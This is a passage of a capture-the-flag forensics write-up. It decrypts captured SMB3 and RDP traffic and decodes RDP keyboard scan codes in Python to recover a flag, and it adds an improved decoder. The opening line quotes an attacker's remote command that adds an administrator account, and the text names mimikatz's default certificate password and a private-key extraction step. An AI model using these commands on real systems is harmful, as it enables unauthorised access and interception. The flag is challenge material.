%COMSPEC% /Q /c echo net user admin kPxQ1GT9zA9E /add ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

So admin's cleartext password is kPxQ1GT9zA9E.

Once this password is entered, Wireshark computes the SMB3 session key itself and decrypts all of that account's encrypted SMB3 traffic.

Two certificates are recovered.

The pfx contains the private key; extract it:

openssl pkcs12 -in 1.pfx -out private.key -nodes

This certificate was exported by mimikatz, so the password is mimikatz's default: mimikatz

Import the private key into the second capture to decrypt the RDP traffic.

Export all the RDP traffic as JSON.

rdp.fastpath.scancode.keycode carries the keyboard input; extract and tidy it:

cat 1.json | grep rdp.fastpath.scancode.keycode | awk -F ":" '{print $2 ","}'

Decode the scan codes:

def map_keycode(key_code):
    """Return the character or key name for a set-1 scan code."""
    # Scan code to key name table
    special_keys = {
        0x00: 'None',              # No key
        0x01: 'Esc',               # Esc
        0x02: '1',                 # 1
        0x03: '2',                 # 2
        0x04: '3',                 # 3
        0x05: '4',                 # 4
        0x06: '5',                 # 5
        0x07: '6',                 # 6
        0x08: '7',                 # 7
        0x09: '8',                 # 8
        0x0A: '9',                 # 9
        0x0B: '0',                 # 0
        0x0C: '-',                 # -
        0x0D: '=',                 # =
        0x0E: 'Backspace',         # Backspace
        0x0F: 'Tab',               # Tab
        0x10: 'Q',                 # Q
        0x11: 'W',                 # W
        0x12: 'E',                 # E
        0x13: 'R',                 # R
        0x14: 'T',                 # T
        0x15: 'Y',                 # Y
        0x16: 'U',                 # U
        0x17: 'I',                 # I
        0x18: 'O',                 # O
        0x19: 'P',                 # P
        0x1A: '[',                 # [
        0x1B: ']',                 # ]
        0x1C: 'Enter',             # Enter
        0x1D: 'Left Ctrl',         # Left Control
        0x1E: 'A',                 # A
        0x1F: 'S',                 # S
        0x20: 'D',                 # D
        0x21: 'F',                 # F
        0x22: 'G',                 # G
        0x23: 'H',                 # H
        0x24: 'J',                 # J
        0x25: 'K',                 # K
        0x26: 'L',                 # L
        0x27: ';',                 # ;
        0x28: "'",                 # '
        0x29: 'Grave',             # `
        0x2A: 'Left Shift',        # Left Shift
        0x2B: 'Backslash',         # \
        0x2C: 'Z',                 # Z
        0x2D: 'X',                 # X
        0x2E: 'C',                 # C
        0x2F: 'V',                 # V
        0x30: 'B',                 # B
        0x31: 'N',                 # N
        0x32: 'M',                 # M
        0x33: ',',                 # ,
        0x34: '.',                 # .
        0x35: '/',                 # /
        0x36: 'Right Shift',       # Right Shift
        0x37: 'Keypad *',          # Keypad *
        0x38: 'Alt',               # Alt
        0x39: 'Space',             # Space
        0x3A: 'Caps Lock',         # Caps Lock
        0x3B: 'F1',                # F1
        0x3C: 'F2',                # F2
        0x3D: 'F3',                # F3
        0x3E: 'F4',                # F4
        0x3F: 'F5',                # F5
        0x40: 'F6',                # F6
        0x41: 'F7',                # F7
        0x42: 'F8',                # F8
        0x43: 'F9',                # F9
        0x44: 'F10',               # F10
        0x45: 'F11',               # F11
        0x46: 'F12',               # F12
        0x47: 'Num Lock',          # Num Lock
        0x48: 'Keypad 7',          # Keypad 7
        0x49: 'Keypad 8',          # Keypad 8
        0x4A: 'Keypad 9',          # Keypad 9
        0x4B: 'Keypad -',          # Keypad -
        0x4C: 'Keypad 4',          # Keypad 4
        0x4D: 'Keypad 5',          # Keypad 5
        0x4E: 'Keypad 6',          # Keypad 6
        0x4F: 'Keypad +',          # Keypad +
        0x50: 'Keypad 1',          # Keypad 1
        0x51: 'Keypad 2',          # Keypad 2
        0x52: 'Keypad 3',          # Keypad 3
        0x53: 'Keypad 0',          # Keypad 0
        0x54: 'Keypad .',          # Keypad .
        0x5B: 'Left Win',          # Left Windows
        0x5C: 'Right Win',         # Right Windows
        0x5D: 'Menu',              # Menu
        0x5E: 'Right Ctrl',        # Right Control
        0x5F: 'Right Alt',         # Right Alt
    }

    return special_keys.get(key_code, f"Unknown key code: {key_code}")

def process_keyboard_data(data):
    """Map each keyboard input entry to its key description."""
    output = []
    for entry in data:
        # Split the scan codes in the entry and convert them to integers
        key_codes = entry.split(',')
        mapped_keys = [map_keycode(int(code, 16)) for code in key_codes]
        output.append(' '.join(mapped_keys))
    return output

# Scan codes extracted from the RDP capture (rdp.fastpath.scancode.keycode)
keyboard_data = [
"0x0f"
,"0x2a"
,"0x36"
,"0x1d"
,"0x1d"
,"0x0f"
,"0x38"
,"0x0f"
,"0x38"
,"0x0f"
,"0x0f"
,"0x2a"
,"0x36"
,"0x1d"
,"0x1d"
,"0x0f"
,"0x38"
,"0x0f"
,"0x38"
,"0x0f"
,"0x0f"
,"0x2a"
,"0x36"
,"0x1d"
,"0x1d"
,"0x0f"
,"0x38"
,"0x0f"
,"0x38"
,"0x0f"
,"0x0f"
,"0x2a"
,"0x36"
,"0x1d"
,"0x1d"
,"0x0f"
,"0x38"
,"0x0f"
,"0x38"
,"0x0f"
,"0x23"
,"0x12"
,"0x23"
,"0x12"
,"0x13"
,"0x12"
,"0x13"
,"0x12"
,"0x39"
,"0x39"
,"0x17"
,"0x1f"
,"0x17"
,"0x39"
,"0x1f"
,"0x39"
,"0x21"
,"0x26"
,"0x21"
,"0x1e"
,"0x26"
,"0x1e"
,"0x22"
,"0x22"
,"0x1c"
,"0x1c"
,"0x20"
,"0x1e"
,"0x20"
,"0x1e"
,"0x13"
,"0x13"
,"0x14"
,"0x14"
,"0x2a"
,"0x1a"
,"0x1a"
,"0x2a"
,"0x06"
,"0x06"
,"0x30"
,"0x30"
,"0x04"
,"0x04"
,"0x1e"
,"0x1e"
,"0x07"
,"0x07"
,"0x05"
,"0x05"
,"0x02"
,"0x02"
,"0x21"
,"0x21"
,"0x0c"
,"0x0c"
,"0x0a"
,"0x0a"
,"0x05"
,"0x05"
,"0x06"
,"0x06"
,"0x05"
,"0x05"
,"0x0c"
,"0x0c"
,"0x05"
,"0x05"
,"0x06"
,"0x06"
,"0x02"
,"0x02"
,"0x09"
,"0x09"
,"0x0c"
,"0x0c"
,"0x1e"
,"0x1e"
,"0x09"
,"0x09"
,"0x06"
,"0x06"
,"0x20"
,"0x20"
,"0x0c"
,"0x0c"
,"0x07"
,"0x07"
,"0x21"
,"0x21"
,"0x08"
,"0x08"
,"0x20"
,"0x20"
,"0x05"
,"0x05"
,"0x20"
,"0x20"
,"0x07"
,"0x07"
,"0x12"
,"0x12"
,"0x1e"
,"0x1e"
,"0x12"
,"0x12"
,"0x21"
,"0x21"
,"0x30"
,"0x30"
,"0x2a"
,"0x2a"
,"0x2a"
,"0x1b"
,"0x1b"
,"0x2a"
,"0x1c"
,"0x1c"
,"0x20"
,"0x18"
,"0x20"
,"0x18"
,"0x31"
,"0x31"
,"0x12"
,"0x12"
,"0x0f"
,"0x5b"
,"0x5c"
,"0x2a"
,"0x36"
,"0x1d"
,"0x1d"
,"0x0f"
,"0x38"
,"0x0f"
,"0x38"
,"0x0f"
]

# Map every entry
keyboard_output = process_keyboard_data(keyboard_data)

# Adjacent duplicates are usually key-down/key-up pairs; collapse them to one press
deduped_output = []
for key in keyboard_output:
    if not deduped_output or deduped_output[-1] != key:
        deduped_output.append(key)

# Print the deduplicated, joined result
joined_output = ' '.join(deduped_output)
print(joined_output)

output:
Tab Left Shift Right Shift Left Ctrl Tab Alt Tab Alt Tab Left Shift Right Shift Left Ctrl Tab Alt Tab Alt Tab Left Shift Right Shift Left Ctrl Tab Alt Tab Alt Tab Left Shift Right Shift Left Ctrl Tab Alt Tab Alt Tab H E H E R E R E Space I S I Space S Space F L F A L A G Enter D A D A R T Left Shift [ Left Shift 5 B 3 A 6 4 1 F - 9 4 5 4 - 4 5 1 8 - A 8 5 D - 6 F 7 D 4 D 6 E A E F B Left Shift ] Left Shift Enter D O D O N E Tab Left Win Right Win Left Shift Right Shift Left Ctrl Tab Alt Tab Alt Tab

Tidying it up gives the flag:

dart{5B3A641F-9454-4518-A85D-6F7D4D6EAEFB}
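
The adjacent-duplicate trick above collapses each key-down/key-up pair into one press, but it cannot tell a repeated key (the same letter typed twice) from a press/release pair, and it discards the Shift state that turned [ and ] into { and }. The following added example (mine, not the post's script) instead consumes (scancode, released) pairs, emits text only on key-down, and tracks Shift and Caps Lock. Modelling the release flag of the keyboard event as a plain boolean is my simplification; the event list is constructed to type dart{5B3A}, Enter, and a doubled n, and the scan-code values are the standard set-1 codes the post's table also uses.

```python
"""Reconstruct typed text from RDP keyboard scan-code events.

Added example for this writeup, not the post's script.  Events are
(scancode, released) pairs; the release flag of the keyboard event is
modelled as a plain boolean here.  The sample event list is constructed.
"""

# Set-1 scan codes -> (unshifted, shifted) characters for the printable keys
PRINTABLE = {
    0x02: ("1", "!"), 0x03: ("2", "@"), 0x04: ("3", "#"), 0x05: ("4", "$"),
    0x06: ("5", "%"), 0x07: ("6", "^"), 0x08: ("7", "&"), 0x09: ("8", "*"),
    0x0A: ("9", "("), 0x0B: ("0", ")"), 0x0C: ("-", "_"), 0x0D: ("=", "+"),
    0x10: ("q", "Q"), 0x11: ("w", "W"), 0x12: ("e", "E"), 0x13: ("r", "R"),
    0x14: ("t", "T"), 0x15: ("y", "Y"), 0x16: ("u", "U"), 0x17: ("i", "I"),
    0x18: ("o", "O"), 0x19: ("p", "P"), 0x1A: ("[", "{"), 0x1B: ("]", "}"),
    0x1E: ("a", "A"), 0x1F: ("s", "S"), 0x20: ("d", "D"), 0x21: ("f", "F"),
    0x22: ("g", "G"), 0x23: ("h", "H"), 0x24: ("j", "J"), 0x25: ("k", "K"),
    0x26: ("l", "L"), 0x27: (";", ":"), 0x28: ("'", '"'), 0x29: ("`", "~"),
    0x2B: ("\\", "|"), 0x2C: ("z", "Z"), 0x2D: ("x", "X"), 0x2E: ("c", "C"),
    0x2F: ("v", "V"), 0x30: ("b", "B"), 0x31: ("n", "N"), 0x32: ("m", "M"),
    0x33: (",", "<"), 0x34: (".", ">"), 0x35: ("/", "?"), 0x39: (" ", " "),
}
SHIFT_KEYS = {0x2A, 0x36}          # Left Shift, Right Shift
CAPS_LOCK, ENTER, BACKSPACE, TAB = 0x3A, 0x1C, 0x0E, 0x0F


def decode_events(events):
    """events: iterable of (scancode, released). Returns the text as typed."""
    shift_down = set()
    caps = False
    out = []
    for code, released in events:
        if code in SHIFT_KEYS:              # modifier: track state, emit nothing
            (shift_down.discard if released else shift_down.add)(code)
            continue
        if released:                        # text is produced on key-down only
            continue
        if code == CAPS_LOCK:
            caps = not caps
        elif code == ENTER:
            out.append("\n")
        elif code == TAB:
            out.append("\t")
        elif code == BACKSPACE:
            if out:
                out.pop()
        elif code in PRINTABLE:
            lo, hi = PRINTABLE[code]
            upper = bool(shift_down) ^ (caps and lo.isalpha())   # Caps Lock affects letters only
            out.append(hi if upper else lo)
        # Ctrl, Alt, Win, function keys and so on produce no text and are ignored
    return "".join(out)


def adjacent_dedupe(events):
    """The post's approach: drop the release flag and collapse adjacent repeats."""
    codes = []
    for code, _released in events:
        if not codes or codes[-1] != code:
            codes.append(code)
    return codes


def tap(code):
    return [(code, False), (code, True)]


def shifted(code):
    return [(0x2A, False)] + tap(code) + [(0x2A, True)]


# Constructed event list: types  dart{5B3A}<Enter>nn
SAMPLE_EVENTS = (
    tap(0x20) + tap(0x1E) + tap(0x13) + tap(0x14)            # d a r t
    + shifted(0x1A)                                          # {
    + tap(0x06) + shifted(0x30) + tap(0x04) + shifted(0x1E)  # 5 B 3 A
    + shifted(0x1B)                                          # }
    + tap(0x1C)                                              # Enter
    + tap(0x31) + tap(0x31)                                  # n n: a repeated key
)

if __name__ == "__main__":
    print(repr(decode_events(SAMPLE_EVENTS)))
    print(adjacent_dedupe(SAMPLE_EVENTS)[-3:])
```

On the constructed events the stateful decoder returns dart{5B3A} followed by a newline and nn, while adjacent_dedupe keeps a single 0x31 at the end, which is exactly the information the post's method loses. When the JSON export also carries the release flag, feeding it in as the boolean here removes the guesswork from the reconstruction.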

References

https://mp.weixin.qq.com/s/6OHYcl0FUwgnp4uu66fT4Q

https://bili33.top/posts/CTF-CCSSSC2026-Regional-Semi-Finals/

Posted 2026-04-22 17:30 by leee0